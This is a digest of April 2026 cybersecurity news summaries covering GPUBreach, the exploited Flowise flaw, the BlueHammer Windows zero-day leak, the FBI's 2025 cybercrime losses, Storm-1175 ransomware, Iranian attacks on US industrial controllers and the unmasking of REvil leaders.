New research has unveiled the GPUBreach attack, which exploits RowHammer vulnerabilities in GDDR6 memory to escalate privileges and potentially gain full control of a host system. By corrupting GPU page tables, unprivileged processes can achieve arbitrary memory access and escalate to root privileges via NVIDIA driver vulnerabilities. This attack bypasses IOMMU protections, posing significant risks to cloud AI and multi-tenant GPU environments. Temporary mitigation includes enabling ECC, though it may not fully protect against such attacks.

New GPUBreach Attack Enables Full CPU Privilege Escalation via GDDR6 Bit-Flips

2026-04-07 | Security Affairs: GPUBreach exploit uses GPU memory bit-flips to achieve full system takeover

GPUBreach exploits GPU memory bit-flips to escalate privileges and potentially take full control of a system. It targets GPU page tables, allowing attackers to manipulate memory and gain arbitrary read/write access, leading to data theft and CPU-level privilege escalation, even with IOMMU enabled. This technique surpasses previous methods by exploiting vulnerabilities in the NVIDIA driver. Recommendations include enabling ECC on supported GPUs, though it is not foolproof against multi-bit flips.

2026-04-07 | Cyber Security News: New GPUBreach Attack Enables System-Wide Compromise Up to a Root Shell

A severe vulnerability named GPUBreach allows attackers to achieve full system compromise, including a root shell, by exploiting GPU Rowhammer techniques. Researchers from the University of Toronto demonstrated that GPUBreach can corrupt GPU page tables through targeted bit flips in GDDR6 memory, bypassing IOMMU defenses. This enables arbitrary access to GPU memory and can lead to severe consequences, including theft of cryptographic keys and degradation of AI model accuracy. The vulnerability was disclosed to major tech companies in November 2025.

2026-04-07 | Infosecurity Magazine: GPU Rowhammer Attack Enables Privilege Escalation and Full System Compromise

Researchers at the University of Toronto have demonstrated a GPU-based Rowhammer attack, named GPUBreach, that escalates privileges to achieve full system compromise. By corrupting GPU page tables through Rowhammer-induced bit flips in GDDR6 memory, an unprivileged CUDA kernel can gain arbitrary access to GPU memory, leading to CPU memory exploitation. This results in arbitrary data exposure, leakage of cryptographic keys, and manipulation of machine learning processes. Current defenses may need reassessment due to these vulnerabilities.

Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed

Date: 2026-04-07 | Source: The Hacker News

Threat actors are exploiting a critical vulnerability (CVE-2025-59528, CVSS 10.0) in Flowise, an AI platform, allowing remote code execution via a code injection flaw. This affects over 12,000 instances, enabling attackers to execute arbitrary JavaScript, compromising systems and accessing sensitive data. The issue was disclosed by Kim SooHyun and patched in version 3.0.6. VulnCheck reports exploitation activity from a single Starlink IP, highlighting the urgency for organizations to address this security risk.

Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed

2026-04-07 | Cyber Security News: Flowise AI Agent Builder Injection Vulnerability Exploited in Attacks, 15,000+ Instances Exposed

Threat actors are exploiting a critical remote code execution vulnerability (CVE-2025-59528) in Flowise, affecting over 15,000 instances. This flaw allows arbitrary JavaScript execution, leading to full system compromise. The vulnerability arises from improper input validation in the CustomMCP node, enabling attackers to execute OS commands via crafted HTTP POST requests. Organizations must upgrade to Flowise version 3.0.6 and restrict public API access to mitigate risks. Initial exploitation was detected in April 2026.

2026-04-07 | Security Affairs: Attackers exploit critical Flowise flaw CVE-2025-59528 for remote code execution

Attackers are exploiting a critical vulnerability in Flowise, tracked as CVE-2025-59528 (CVSS score 10), allowing remote code execution due to improper validation of user-supplied JavaScript. This flaw affects versions up to 3.0.5 and was patched in 3.0.6. Exploitation requires only an API token, posing significant risks to business operations and sensitive data. VulnCheck detected initial exploitation from a single Starlink IP, with 12,000–15,000 exposed instances online.

2026-04-08 | CSO Online: Hackers exploit a critical Flowise flaw affecting thousands of AI workflows

Hackers are exploiting a critical flaw in the Flowise low-code platform, allowing arbitrary JavaScript injection due to a design oversight in the custom MCP node. This vulnerability, rated at maximum severity, enables attackers to insert malicious code. A recent VulnCheck alert indicates that nearly 15,000 Flowise instances are exposed on the public internet, highlighting the urgent need for organizations using this platform to address the vulnerability.

2026-04-08 | TechRadar: Top open source AI platform Flowise hit by maximum-level security issue

Flowise, an open-source AI platform, has a CVSS-10 vulnerability (CVE-2025-59528) in version 3.0.5, allowing arbitrary code execution via the CustomMCP node. Discovered in September 2025, it has been exploited in the wild, with up to 15,000 instances potentially exposed. The flaw was fixed in version 3.0.6, with the latest being 3.1.1. Users are urged to update immediately and consider removing instances from public access to mitigate risks.

Researcher Released Windows Defender 0-Day Exploit Code, Allowing Attackers to Gain Full Access

Date: 2026-04-07 | Source: Cyber Security News

A security researcher, Chaotic Eclipse, has released a zero-day local privilege escalation exploit for Windows, named BlueHammer, allowing low-privileged users to gain SYSTEM-level access. The exploit affects Windows 11 (Build 10.0.26200.8037) and includes credential-harvesting capabilities. The researcher cited frustrations with Microsoft's Security Response Center as motivation for the uncoordinated disclosure. Mitigations include monitoring EDR tools and restricting user permissions. No patch or CVE has been issued yet.

Researcher Released Windows Defender 0-Day Exploit Code, Allowing Attackers to Gain Full Access

2026-04-07 | Security Affairs: Experts published unpatched Windows zero-day BlueHammer

A researcher leaked the unpatched Windows zero-day "BlueHammer," allowing attackers to gain SYSTEM rights. Reported to Microsoft but criticized for the disclosure process, the exploit was published on GitHub on April 3, 2026. The local privilege escalation flaw can access the Security Account Manager (SAM) database, enabling full system compromise. Experts confirmed its legitimacy, noting that exploitation requires local access but poses significant risks through social engineering or credential theft. No patch is available.

2026-04-07 | Cyber Security News: BlueHammer PoC for Windows Defender Exploited by Researchers to Escalate Privileges

A proof-of-concept exploit named BlueHammer targets a zero-day local privilege escalation vulnerability in Microsoft Windows Defender. It exploits a TOCTOU race condition during the signature update process, allowing attackers to leak the Security Account Manager (SAM) database and potentially gain elevated privileges. Researchers recommend monitoring symbolic link creation and restricting local administrator accounts. Microsoft has not yet issued a patch, classifying BlueHammer as an active zero-day.

2026-04-07 | TechRadar: 'I was not bluffing Microsoft, and I'm doing it again': apparently disgruntled researcher leaks worrying Windows zero-day security flaw

A security researcher, known as Chaotic Eclipse, leaked exploit code for a Windows zero-day vulnerability named BlueHammer, which allows local privilege escalation to SYSTEM. The researcher criticized Microsoft's handling of vulnerability disclosures and noted that the exploit's reliability is uncertain. Microsoft reiterated its commitment to investigating security issues and supporting coordinated vulnerability disclosure. The flaw can only be exploited by local attackers, making it somewhat harder to leverage.

2026-04-08 | Help Net Security: BlueHammer: Windows zero-day exploit leaked

A proof-of-concept exploit for a Windows local privilege escalation vulnerability, named BlueHammer, has been leaked on GitHub. It allows attackers to extract NTLM password hashes and gain SYSTEM privileges. The exploit works on patched Windows 10, 11, and Server systems. Security experts recommend monitoring for unusual password changes and limiting user account privileges. Currently, there are no reports of active exploitation, but the potential for misuse exists. Microsoft has not yet commented on the situation.

Understanding Current Threats to Kubernetes Environments

Date: 2026-04-06 | Source: Palo Alto

The article discusses the rising threats to Kubernetes environments, noting a 282% increase in attacks, particularly targeting the IT sector. It highlights two case studies: one involving stolen service account tokens leading to a cryptocurrency exchange breach, and another exploiting the React2Shell vulnerability (CVE-2025-55182) for remote code execution. Recommendations include enforcing least privilege access, using short-lived tokens, and enhancing runtime monitoring to detect and mitigate threats effectively.

Understanding Current Threats to Kubernetes Environments

2026-04-07 | Cisco Talos: Year in Review: Vulnerabilities old and new and something React2

The Talos 2025 Year in Review highlights a significant rise in vulnerabilities, particularly React2Shell, which saw the highest attack percentage in late 2025. Legacy dependencies like Log4j and PHPUnit expanded the attack surface, with attackers focusing on remote code execution flaws and identity-related systems. Recommendations include evaluating identity-centric components and prioritizing patching of network devices to mitigate risks associated with outdated infrastructure and exposure vulnerabilities.

2026-04-07 | Cybersecurity Dive: React2Shell vulnerability helps hackers steal credentials, AI platform keys and other sensitive data

A cyber threat actor is exploiting the React2Shell vulnerability to conduct a credential-harvesting campaign, compromising at least 766 servers globally. The attackers upload a malicious payload to vulnerable React Server Components, enabling arbitrary code execution and automated extraction of sensitive data, including API keys, cloud tokens, and SSH keys. The harvested data is sent to a hacker-controlled server, NEXUS Listener, which allows easy access to the stolen information.

2026-04-07 | Cyber Security News: Hackers Exploit Next.js React2Shell Flaw to Steal Credentials From 766 Hosts in 24 Hours

Hackers are exploiting the critical React2Shell vulnerability (CVE-2025-55182) in Next.js applications, breaching 766 servers in 24 hours and stealing sensitive data, including passwords and cloud keys. The flaw allows code execution via a crafted HTTP request without authentication. Cisco Talos linked the attacks to threat cluster UAT-10608, utilizing a command-and-control framework called NEXUS Listener. Organizations are urged to patch vulnerabilities and rotate all secrets immediately to mitigate risks.

2026-04-07 | Cyber Security News: Hackers Exploit Kubernetes Misconfigurations to Move From Containers to Cloud Accounts

Threat actors are exploiting Kubernetes misconfigurations to transition from containers to cloud accounts, with a 282% increase in related attacks over the past year. In 2025, 22% of monitored cloud environments showed suspicious activity linked to service account token theft. Notable incidents include a North Korean group targeting a cryptocurrency exchange, using stolen tokens to access sensitive financial systems. Recommendations include enforcing strict RBAC policies, using short-lived tokens, and enabling Kubernetes audit logs for early detection of misuse.

FBI: Cyber fraud surges to $17.6 billion in losses as scams, crypto theft soar

Date: 2026-04-06 | Source: Recorded Future

In 2025, the FBI's Internet Crime Complaint Center reported $17.6 billion in losses from cyber-enabled fraud, accounting for 85% of total losses. Investment fraud led with $8.6 billion, followed by business email compromise at over $3 billion. Ransomware remains a significant threat, with 63 new variants identified and 3,611 complaints resulting in over $32 million in losses. AI-related complaints totaled approximately 22,000, with $893 million lost, and cryptocurrency theft accounted for over $11.3 billion.

FBI: Cyber fraud surges to $17.6 billion in losses as scams, crypto theft soar

2026-04-07 | Infosecurity Magazine: Over $17bn Lost to Cyber Fraud in the Last Year, Warns FBI

Cybercrime cost victims over $17.7 billion in 2025, according to the FBI's Internet Crime Report published on April 6. The report noted over a million complaints, with cryptocurrency scams causing $7.2 billion in losses, followed by Business Email Compromise at $3 billion and tech support scams at over $2 billion. For the first time, AI-enabled fraud was highlighted, resulting in nearly $893 million in losses. The FBI emphasized the need for vigilance against evolving cyber threats.

2026-04-07 | TechRadar: I can't think of anything that's off limits to them': FBI slams cybercriminals for attacking schools, hospitals, as crypto fraud soars

The FBI's 2025 Internet Crime Report reveals cybercriminals stole $17.6 billion, primarily through cyber-enabled fraud and investment scams. Ransomware attacks have increasingly targeted vulnerable sectors like hospitals and schools, with over 200 variants currently under investigation. The report noted 3,611 complaints leading to $32 million in losses, with critical infrastructure suffering at least 655 ransomware incidents totaling over $261 million in reported losses. Authorities managed to freeze approximately $146 million related to these cases.

2026-04-07 | Cyberscoop: Cybercrime losses jumped 26% to $20.9 billion in 2025

Cybercrime losses reached $20.9 billion in 2025, a 26% increase from 2024, according to the FBI's IC3 report. Investment-related fraud accounted for $8.65 billion, followed by business email compromise at $3.05 billion. Victims over 60 reported the highest losses, totaling $7.75 billion. Phishing was the most reported crime, with ransomware losses at $32.3 million. The report noted that all critical infrastructure sectors faced ransomware attacks, emphasizing the need for enhanced cybersecurity measures.

2026-04-07 | The Register: US cybercrime losses pass $20B for first time as AI boosts online fraud

Cybercrime losses in the US reached a record $20.87 billion in 2025, with over one million complaints filed, a 17% increase from 2024. Phishing topped the complaints, while investment scams caused the most financial damage at $8.6 billion. AI-related cybercrime reports numbered 22,364, leading to $893 million in losses. Notable AI uses included business email compromise and romance scams. Government impersonation scams surged by 128% from 2023 to 2025, highlighting evolving cyber threats.

2026-04-07 | Help Net Security: Cybercrime losses break the $20 billion mark

Cybercrime losses reached $20.877 billion in 2025, a 26% increase from the previous year, according to the FBI's IC3 report. Over one million complaints were filed, with cyber-enabled fraud causing $17.7 billion in losses. Phishing incidents topped the complaint list at 191,561. Investment scams, particularly involving cryptocurrency, accounted for $8.6 billion. AI-related fraud linked to over 22,000 complaints resulted in nearly $893 million in losses. Ransomware losses exceeded $32 million, with ongoing threat development noted.

2026-04-08 | Risky.Biz: Risky Bulletin: Cybercrime losses passed $20 billion last year

Americans lost nearly $21 billion to cybercrime in the past year, according to the FBI's Internet Crime Report. Investment scams topped the losses at $8.6 billion, with $6.2 billion in cryptocurrency. Cyber-enabled fraud accounted for 85% of total losses. The FBI received over one million cybercrime reports for the first time, averaging over 3,000 daily. The report influences law enforcement and legislative actions against cyber scams, with international pressure on countries harboring cybercriminals.

2026-04-08 | CNET: Crypto Scams and Senior Fraud Drive $21 Billion in 2025 Cyber Theft, FBI Reports

In 2025, the FBI reported over $21 billion in cyber theft, with more than 1 million complaints. Phishing and extortion were the top crime types. The over-60 demographic faced $7.75 billion in losses, while cryptocurrency-related scams accounted for over $11 billion. AI's role in scams is increasing, with 22,364 complaints costing $893 million. The FBI's IC3 Recovery Asset Team froze $679 million in assets from attempted thefts, and a new Scam Center Strike Force targets cryptocurrency fraud.

Inside an AI‑enabled device code phishing campaign

Date: 2026-04-06 | Source: Microsoft Security

Microsoft Defender Security Research identified a sophisticated phishing campaign exploiting Device Code Authentication to compromise organizational accounts. This campaign utilized AI for dynamic code generation, bypassing the 15-minute expiration window. Threat actors employed automation to create personalized phishing emails and leveraged legitimate platforms for redirection. Post-compromise, they focused on high-value targets, utilizing Microsoft Graph for reconnaissance and establishing persistence through malicious inbox rules. Recommendations include enforcing MFA and blocking legacy authentication.

Inside an AI‑enabled device code phishing campaign

2026-04-07 | Help Net Security: AI-enabled device code phishing campaign exploits OAuth flow for account takeover

A phishing campaign exploiting the OAuth Device Code Authentication flow has been identified, allowing attackers to bypass MFA and compromise accounts. This automated attack uses AI to generate device codes, enabling unauthorized access without credential exposure. Threat actors employ deceptive emails and legitimate-looking interfaces to lure users. Once a user authenticates, attackers can register new devices for persistence and exfiltrate sensitive data. The campaign's reconnaissance phase occurs 10-15 days prior to the phishing attempt.

2026-04-07 | The Register: Hundreds of orgs compromised daily in Microsoft device code phishing attacks

A Microsoft device-code phishing campaign has compromised hundreds of organizations daily since March 15, 2026. Attackers utilize AI for hyper-personalized phishing emails and employ dynamic device code generation to bypass multi-factor authentication (MFA). The campaign targets finance-related accounts, exfiltrating sensitive data. Microsoft recommends limiting device code flow usage and training employees to recognize phishing attempts. The attack's sophistication marks a significant escalation in threat actor tactics.

2026-04-08 | Cyber Security News: Hackers Used EvilTokens, ClickFix Campaign to Attack Claude Code Users with AMOS Stealer

Hackers launched two campaigns in March 2026 targeting enterprise accounts and macOS users. The EvilTokens campaign exploits Microsoft’s OAuth 2.0 Device Code flow, bypassing MFA and allowing attackers to gain access to Microsoft 365 applications. Over 180 phishing URLs were detected, primarily affecting sectors in the U.S. and India. Simultaneously, the ClickFix campaign targeted macOS developers, using fake documentation to execute the AMOS Stealer, compromising sensitive data and establishing persistent access. Recommendations include auditing sign-in logs and blocking unsigned scripts.

Storm-1175 focuses gaze on vulnerable web-facing assets in high-tempo Medusa ransomware operations

Date: 2026-04-06 | Source: Microsoft Security

Storm-1175 is a financially motivated cybercriminal group that conducts rapid ransomware operations, primarily targeting vulnerable web-facing assets. They exploit N-day vulnerabilities, often within days of disclosure, and have been observed using zero-day exploits. Recent attacks have impacted healthcare, education, and finance sectors in Australia, the UK, and the US. Storm-1175 employs various techniques for initial access, lateral movement, credential theft, and ransomware deployment, notably using Medusa ransomware.

Storm-1175 focuses gaze on vulnerable web-facing assets in high-tempo Medusa ransomware operations

2026-04-07 | The Hacker News: China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware

A China-based threat actor, Storm-1175, is exploiting zero-day and N-day vulnerabilities to deploy Medusa ransomware in rapid attacks against healthcare, education, professional services, and finance sectors in Australia, the UK, and the US. The group has exploited over 16 vulnerabilities since 2023, including CVE-2025-10035 and CVE-2026-23760 as zero-days. Tactics include using living-off-the-land binaries, modifying firewall policies, and leveraging RMM tools for covert operations, complicating detection efforts.

2026-04-07 | Cyber Security News: Microsoft Warns Storm-1175 Exploits Web-Facing Assets 0-Day Flaws in Medusa Ransomware Attacks

A new ransomware campaign by the threat group Storm-1175 targets vulnerable, internet-facing systems using Medusa ransomware. The group exploits N-day vulnerabilities, acting swiftly within 24 hours of a flaw's disclosure. They have also utilized zero-day vulnerabilities, such as CVE-2026-23760 and CVE-2025-10035. Storm-1175 employs a double extortion model, encrypting and stealing data. Microsoft advises organizations to patch vulnerabilities within 72 hours and monitor for signs of credential theft and unauthorized changes.

2026-04-07 | Infosecurity Magazine: Storm-1175 Exploits Flaws in High-Velocity Medusa Attacks

Storm-1175, a financially motivated cybercrime group, has been exploiting n-day and zero-day vulnerabilities in Medusa ransomware attacks, impacting healthcare, education, professional services, and finance sectors in Australia, the UK, and US. Since 2023, they have exploited at least 16 vulnerabilities, including CVE-2025-10035. Microsoft recommends using perimeter scanning tools, isolating web-facing systems, and employing web application firewalls (WAF) to mitigate risks.

2026-04-07 | CSO Online: Microsoft says Medusa-linked Storm-1175 is speeding ransomware attacks

Microsoft has issued a warning regarding Storm-1175, a cybercrime group associated with Medusa ransomware, which is rapidly executing ransomware attacks. The group targets vulnerable web-facing systems, often transitioning from initial access to data theft and ransomware deployment within 24 hours. Key sectors affected include healthcare, education, professional services, and finance in Australia, the UK, and the US. Storm-1175 has also exploited zero-day vulnerabilities prior to their public disclosure.

2026-04-07 | Security Affairs: Fast-moving Storm-1175 uses new exploits to breach networks and drop Medusa

China-based actor Storm-1175 conducts rapid ransomware attacks, exploiting newly disclosed vulnerabilities to deploy Medusa ransomware within 24 hours. Targeting sectors like healthcare and finance in the US, UK, and Australia, they leverage flaws in platforms such as Microsoft Exchange and Ivanti. The group uses advanced techniques, including zero-day exploits, credential theft, and lateral movement, while modifying antivirus settings to evade detection. Microsoft has provided IoCs and mitigation guidance for these threats.

2026-04-08 | TechRadar: Microsoft flags China-based hackers using vicious new 'rapid attack' zero-days to launch ransomware at targets across the world

Chinese-speaking hacking group Storm-1175 is rapidly transitioning from initial access to ransomware deployment, often within 24 hours. They exploit both zero-day and n-day vulnerabilities across multiple products, including Microsoft Exchange (CVE-2023-21529) and others. Targeting healthcare, finance, education, and professional services, their operations have been noted primarily in the US, UK, and Australia. They disable antivirus tools before deploying Medusa ransomware, leveraging over 16 identified vulnerabilities.

2026-04-08 | Hack Read: Storm-1175 Deploys Medusa Ransomware Within 24 Hours of Flaw Disclosure

Storm-1175, a hacker group, rapidly deploys Medusa ransomware, exploiting vulnerabilities within 24 hours of their disclosure. They target perimeter assets lacking security updates, focusing on N-day vulnerabilities. Recent attacks include exploiting CVE-2025-31324 on SAP NetWeaver and CVE-2023-27351 on Papercut. The group uses tools like AnyDesk and PDQ Deployer to spread ransomware and disable antivirus defenses. Experts recommend faster update installations and employing Tamper Protection to enhance security.

Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure

Date: 2026-04-06 | Source: CISA Cybersecurity Advisories

Iranian-affiliated APT actors are exploiting internet-facing Rockwell Automation/Allen-Bradley PLCs across U.S. critical infrastructure, causing operational disruptions and financial losses. The FBI and CISA recommend organizations review TTPs and IOCs, disconnect PLCs from the internet, and implement security measures including MFA and secure gateways. Malicious interactions with project files and data manipulation on HMI/SCADA displays have been reported. Affected sectors include Government Services, Water, and Energy.

2026-04-07 | Cyberscoop: Iranian hackers launching disruptive attacks at U.S. energy, water targets, feds warn

Iranian government hackers are conducting disruptive cyberattacks on U.S. energy and water infrastructure, targeting internet-facing operational technology devices, including Rockwell Automation PLCs. A joint alert from U.S. agencies indicates these attacks have caused operational disruptions and financial losses across multiple critical infrastructure sectors. The activity intensified following U.S.-Israel strikes against Iran, with previous warnings issued after an attack on a Pennsylvania water facility in late 2023.

2026-04-07 | TechCrunch: Iranian hackers are targeting American critical infrastructure, US agencies warn

Iranian-backed hackers are targeting U.S. critical infrastructure, including water, energy, and local government systems, according to a joint advisory from the FBI, NSA, CISA, and the Department of Energy. The hackers exploit internet-facing systems, manipulating programmable logic controllers and SCADA products, leading to operational disruptions and financial losses. This escalation follows the U.S.-Israel conflict, with the group Handala linked to prior attacks, including a breach at medical tech firm Stryker.

2026-04-07 | Wired: Iran-Linked Hackers Are Sabotaging US Energy and Water Infrastructure

Iranian hackers have targeted US energy and water infrastructure, compromising industrial control systems, including programmable logic controllers (PLCs) from Rockwell Automation. A joint advisory from the FBI, NSA, Department of Energy, and CISA warns of operational disruptions and financial losses due to these attacks. The hacking campaign is linked to the Iran-affiliated group CyberAv3ngers, known for previous attacks on Israeli and US targets. Rockwell Automation is coordinating with agencies to enhance PLC security.

2026-04-07 | Recorded Future: FBI, Pentagon warn of Iran hacking groups targeting operational technology

Hackers affiliated with Iran are targeting U.S. critical infrastructure, specifically internet-facing operational technology (OT) devices, causing operational disruptions and financial losses. The FBI and other agencies reported attacks on PLCs from Rockwell Automation and Siemens, affecting municipal governments and water systems. The advisory highlights CVE-2021-22681, urging organizations to patch vulnerabilities and remove OT from direct internet exposure. The campaign is linked to previous Iranian attacks on critical infrastructure.

2026-04-07 | The Register: Iran cyber actors disrupting US water, energy facilities, FBI warns

Iranian-affiliated cyber actors are increasingly targeting US water and energy facilities, disrupting operations, according to a joint alert from the FBI and other agencies. The attacks focus on Rockwell Automation/Allen-Bradley PLCs, with the group CyberAv3ngers exploiting default passwords to gain access. Recent activities include deploying custom malware to manipulate data on OT devices. Recommendations include patching systems, enabling multi-factor authentication, and disconnecting internet-exposed PLCs.

2026-04-08 | The Hacker News: Iran-Linked Hackers Disrupt U.S. Critical Infrastructure by Targeting Internet-Exposed PLCs

Iran-affiliated hackers are targeting U.S. critical infrastructure by exploiting internet-facing PLCs, causing operational disruptions and financial losses. The FBI reported that these attacks involve manipulating PLC data and using third-party software for unauthorized access. Key sectors affected include government services, water systems, and energy. Recommendations include avoiding internet exposure, implementing MFA, and monitoring unusual traffic. The advisory highlights a broader trend of Iranian cyber escalation against both IT and OT infrastructures.

2026-04-08 | Security Affairs: U.S. agencies alert: Iran-linked actors target critical infrastructure PLCs

U.S. agencies, including the FBI and CISA, warn that Iran-linked hackers are targeting internet-exposed Rockwell/Allen-Bradley PLCs in critical infrastructure, causing operational disruptions and financial losses. The advisory highlights attacks involving manipulation of project files and data on HMI and SCADA systems. Organizations are urged to assess exposed devices, disconnect from the internet, and follow security guidance. The campaign is linked to the IRGC-affiliated group CyberAv3ngers, which has compromised at least 75 devices since November 2023.

2026-04-08 | Infosecurity Magazine: Iran‑Backed Threat Actors Hit US CNI Providers via Internet‑Facing OT Assets

Iranian-affiliated hackers have targeted US critical national infrastructure (CNI) providers, causing operational disruptions and financial losses. The Cybersecurity and Infrastructure Security Agency (CISA) advisory from April 7 highlights attacks on internet-facing operational technology (OT) assets, particularly Rockwell Automation PLCs. Recommendations include using secure gateways, monitoring logs for indicators of compromise, and ensuring physical security of devices. Experts emphasize the need for improved visibility and incident response plans in OT environments.

2026-04-08 | Help Net Security: Iranian cyber activity hits US energy, water, and government networks

U.S. government agencies warned of ongoing Iranian cyber activity targeting operational technology (OT) and programmable logic controllers (PLCs) in critical infrastructure sectors, including energy and water. The activity has caused disruptions through malicious interactions with project files and data manipulation on HMI and SCADA systems. Recommendations include disconnecting PLCs from the internet, limiting remote access, and regularly testing backups to ensure recovery from potential compromises.

2026-04-08 | CSO Online: Iran‑linked PLC attacks cause real‑world disruption at critical US infra sites

Iran-affiliated threat actors have compromised internet-exposed programmable logic controllers (PLCs) at critical US infrastructure facilities, including water, energy, and government sectors, since at least March 2026. The advisory, co-authored by multiple federal agencies, links these attacks to rising tensions between Iran and the US and Israel. Victims reported operational disruptions and financial losses. The targeted PLCs include those from Rockwell Automation and Allen-Bradley.

2026-04-08 | Cybersecurity Dive: Iran-linked hackers target water, energy in US, FBI and CISA warn

Iran-linked hackers have targeted U.S. critical infrastructure, including water and energy sectors, exploiting vulnerabilities in Rockwell Automation's programmable logic controllers (PLCs). The FBI and CISA reported data manipulation incidents causing financial losses and operational disruptions. A specific authentication bypass vulnerability (CVE-2021-22681) was highlighted, urging organizations to enhance security measures. Over 3,000 Rockwell devices remain exposed on the public internet, increasing the risk of exploitation.

2026-04-08 | TechRadar: US agencies warn Iranian hackers are targeting American critical infrastructure — causing 'disruptive effects within the United States'

US agencies, including the FBI and CISA, issued a security advisory regarding ongoing Iranian cyberattacks targeting American critical infrastructure, specifically Rockwell Automation/Allen-Bradley PLCs. These attacks aim to exploit operational technology devices, causing disruptions and financial losses across sectors like Government Services, Water, and Energy. The advisory highlights potential links to a ransomware attack at a North Dakota water treatment plant, though no direct connection has been confirmed.

2026-04-08 | Security Magazine: Iranian-Linked Cyber Actors Target US Critical Infrastructure, Security Leaders Respond

Iranian cyber actors are targeting U.S. critical infrastructure, including water, energy, and government services, according to a CISA warning. Security experts emphasize the increased sophistication of attacks, leveraging AI for social engineering and credential theft. Notable incidents include a wiper attack on Stryker. Organizations are advised to enhance defenses by restricting internet access to operational technology, enforcing multi-factor authentication, and adopting zero standing privilege models to mitigate risks from potential cyber warfare.

2026-04-08 | Ars Technica: Iran-linked hackers disrupt operations at US critical infrastructure sites

Hackers linked to the Iranian government are disrupting operations at multiple US critical infrastructure sites, targeting programmable logic controllers (PLCs) since at least March 2026. An advisory from several US agencies warns of operational disruptions and financial losses across sectors like Government Services, Waste Water Systems, and Energy. Rockwell Automation/Allen-Bradley PLCs are particularly affected, with 5,219 devices exposed online, 75% of which are in the US.

2026-04-09 | Cybersecurity Dive: NERC is ‘actively monitoring the grid’ following Iran-linked cyber threat

Hackers affiliated with Iran are targeting programmable logic controllers (PLCs) in critical sectors, including power and water, as per a CISA advisory. NERC is actively monitoring the grid and coordinating with the DOE. The advisory warns of operational disruptions due to malicious interactions with PLCs, urging U.S. organizations to review security measures. Rockwell Automation's PLCs were specifically mentioned, with recommendations for enhancing security. The advisory highlights the urgency amid escalating tensions between the U.S. and Iran.

2026-04-09 | Cyberscoop: Iranian attacks on US critical infrastructure puts 3,900 devices in crosshairs

Iranian state-backed attacks have targeted over 5,200 internet-connected devices in U.S. critical infrastructure, with nearly 3,900 being Rockwell Automation/Allen-Bradley programmable logic controllers (PLCs). The devices, primarily in the energy and water sectors, are at risk due to their cellular connections, with many running end-of-life software. Federal agencies issued a joint alert detailing the vulnerabilities, which have led to financial losses for some victims. The attacks have been ongoing since March.

2026-04-10 | Cyber Security News: Censys Warns 5,219 Rockwell/Allen-Bradley PLCs Are Exposed Amid Iranian APT Activity

On April 7, 2026, U.S. agencies warned that Iranian APT actors are targeting Rockwell Automation/Allen-Bradley PLCs, with 5,219 exposed globally, primarily in the U.S. (3,891 hosts). The attackers, linked to the IRGC-CEC, exploit legitimate software to manipulate PLCs, posing risks to critical infrastructure. Recommendations include removing devices from internet exposure, disabling vulnerable services, and implementing multi-factor authentication. Key protocols under threat include EtherNet/IP, Modbus, and Telnet.

2026-04-10 | Cybersecurity Dive: Nearly 4K industrial control devices vulnerable to Iran-linked hacking campaign

Iran-linked hackers are targeting over 5,000 industrial control devices globally, with approximately 3,900 in the U.S. U.S. agencies warn that these hackers are compromising Rockwell Automation's Allen-Bradley PLCs, primarily through cellular modems and satellite connections. Many devices are accessible via insecure protocols like HTTP, VNC, and Telnet, expanding the attack surface. Censys recommends disconnecting PLCs from the internet, logging suspicious traffic, and implementing multifactor authentication for remote access.

2026-04-11 | Security Affairs: Censys finds 5,219 devices exposed to attacks by Iranian APTs, majority in U.S.

Censys identified 5,219 exposed Rockwell PLCs, primarily in the U.S. (74.6%), vulnerable to Iranian APT attacks. U.S. agencies warned that these actors target operational technology in critical infrastructure, manipulating project files and HMI/SCADA data, causing disruptions. Many devices run outdated firmware and are accessible via cellular networks. Recommendations include securing or disconnecting devices, reviewing indicators of compromise, and following vendor security guidance.

2026-04-13 | Cyber Security News: Iran-Linked CyberAv3ngers Sets Sights on Water Utilities and Industrial Controllers

An Iran-backed cyber group, CyberAv3ngers, has targeted U.S. critical infrastructure, exploiting vulnerabilities in internet-facing PLCs. A joint advisory from six U.S. agencies confirmed operational disruptions linked to the group, which has compromised at least 75 PLCs. They exploited CVE-2021-22681, a critical flaw in Rockwell Automation controllers, with no patch available. Their advanced malware, IOCONTROL, blends into IoT traffic, complicating detection. Organizations are urged to disconnect affected devices and enhance security measures.

Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab

Date: 2026-04-06 | Source: Krebs on Security

German authorities have identified Daniil Maksimovich Shchukin, 31, as the head of the ransomware groups GandCrab and REvil, responsible for over 130 cyberattacks from 2019 to 2021, causing more than 35 million euros in damages. Shchukin and accomplice Anatoly Kravchuk extorted nearly 2 million euros. The BKA linked Shchukin to a digital wallet with over $317,000 in cryptocurrency. REvil, known for double extortion tactics, targeted large organizations, including a significant attack on Kaseya in July 2021.

Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab

2026-04-06 | The Hacker News: BKA Identifies REvil Leaders Behind 130 German Ransomware Attacks

Germany's BKA has identified Daniil Maksimovich Shchukin, alias UNKN, as a leader of the REvil ransomware group, responsible for 130 attacks in Germany, resulting in €1.9 million in ransom payments and over €35.4 million in damages. Also wanted is Anatoly Sergeevitsch Kravchuk, a developer for REvil. The group, linked to high-profile victims like JBS and Kaseya, ceased operations in 2021 following law enforcement actions, including arrests by Russia's FSB.

2026-04-06 | Security Affairs: BKA unmasks two REvil Ransomware operators behind 130+ German attacks

German police BKA identified two key members of the REvil ransomware group, Daniil Maksimovich Shchukin (31) and Anatoly Sergeevitsch Kravchuk (43), linking them to over 130 attacks in Germany from 2019 to 2021. They extorted nearly €2 million, causing over €35 million in damages. Shchukin, known as UNKN, promoted ransomware on cybercrime forums and is wanted internationally. Both suspects are believed to be in Russia, with Shchukin previously associated with the GandCrab group.

2026-04-06 | Recorded Future: German police unmask two suspects linked to REvil ransomware gang

German authorities have identified Daniil Shchukin and Anatoly Kravchuk as suspects linked to the REvil and GandCrab ransomware gangs. They are believed to be responsible for around two dozen attacks, generating nearly $2.3 million in extorted payments and causing over $40 million in damages. Both men are currently in Russia and are wanted internationally. REvil, dismantled in 2021, targeted high-profile victims and operated under a ransomware-as-a-service model.

